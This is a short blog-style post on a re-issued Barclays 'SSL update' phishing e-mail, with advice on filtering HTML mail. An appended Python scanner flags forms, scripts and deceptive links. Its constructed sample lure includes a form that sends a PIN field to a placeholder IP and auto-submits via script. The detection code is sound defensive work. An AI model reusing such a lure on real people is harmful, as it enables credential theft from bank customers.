[Barclays Phishing Message: SSL Update Scam]

Last April, Barclays Bank clients were sucked in by an e-mail proclaiming the firm’s great pride in its flashy new SSL servers. The required finishing touch?

Simply “update your account info at the following link…”

Of course.

Apparently, several Barclays customers proved Darwin’s theory by complying. How do we know?

The intrepid phisher has re-issued the SSL scam. Why do people keep falling for this nonsense? “Because it’s not gonna happen to me.”

Study after study shows that many have never heard of phishing or other scams, and among those who have, a huge chunk thinks the bank or IT department will dig them out of any mudhole they wade into.

Fact is, network managers can break up the vast majority of these scams. On the email sender side, Barclays et al. can easily switch from blasting missives filled with logos and pretty HTML-formatted paragraphs to plain text dispatches. While they’re not as cute, you can’t hide redirects or dangerous scripts in plain text email.

On the receiving side, admins can deploy SMTP authentication as part of their overall network content filtering scheme, which should already include interdiction of spam and viruses. In addition, those with stiff spines and upper management backing would be well advised to set their anti-spam systems to disable dangerous HTML (like forms and embedded links), as well as scripts.
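As an added illustration of the filtering the last paragraph recommends (this is example code, not anything from the original post or from Barclays), here is a small Python scanner that flags the three constructs the post calls dangerous: forms, scripts (including inline handlers and javascript: URLs), and links whose displayed URL names a different host than the real href, which is how an HTML lure hides its redirect. The sample message is constructed in the style of the SSL lure; the 192.0.2.10 address is a documentation placeholder.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

class DangerousHtmlScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []
        self._href = None   # href of the <a> currently open, if any
        self._text = []     # visible text collected inside that <a>

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag in ("form", "script"):
            self.findings.append(f"{tag} element")
        elif tag == "a" and attrs.get("href"):
            self._href = attrs["href"]
            self._text = []
        # javascript: URLs and on* event handlers are script too, whatever the tag
        for name, value in attrs.items():
            if name.startswith("on") or (value or "").lstrip().lower().startswith("javascript:"):
                self.findings.append(f"inline script on <{tag}>")
                break

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            shown = "".join(self._text).strip()
            real_host = urlparse(self._href).hostname or ""
            # Anchor text that looks like a URL must name the host the href really goes to.
            if "." in shown and " " not in shown:
                shown_host = urlparse(shown if "://" in shown else "//" + shown).hostname or ""
                if shown_host and shown_host != real_host:
                    self.findings.append(f"link text shows {shown_host} but points at {real_host}")
            self._href = None

def scan_html_email(body: str) -> list:
    """Return the list of dangerous constructs found in one HTML message body."""
    scanner = DangerousHtmlScanner()
    scanner.feed(body)
    return scanner.findings

# Constructed sample in the style of the SSL "update your account" lure (not a real message).
SAMPLE = """<html><body><p>We have installed new SSL servers. Please update your account at
<a href="http://192.0.2.10/barclays/login">https://www.barclays.co.uk/update</a></p>
<form action="http://192.0.2.10/collect" method="post"><input name="pin"></form>
<script>document.forms[0].submit()</script></body></html>"""
```

A filter built on this logic would quarantine or strip the message rather than just list findings; a plain-text message produces an empty list.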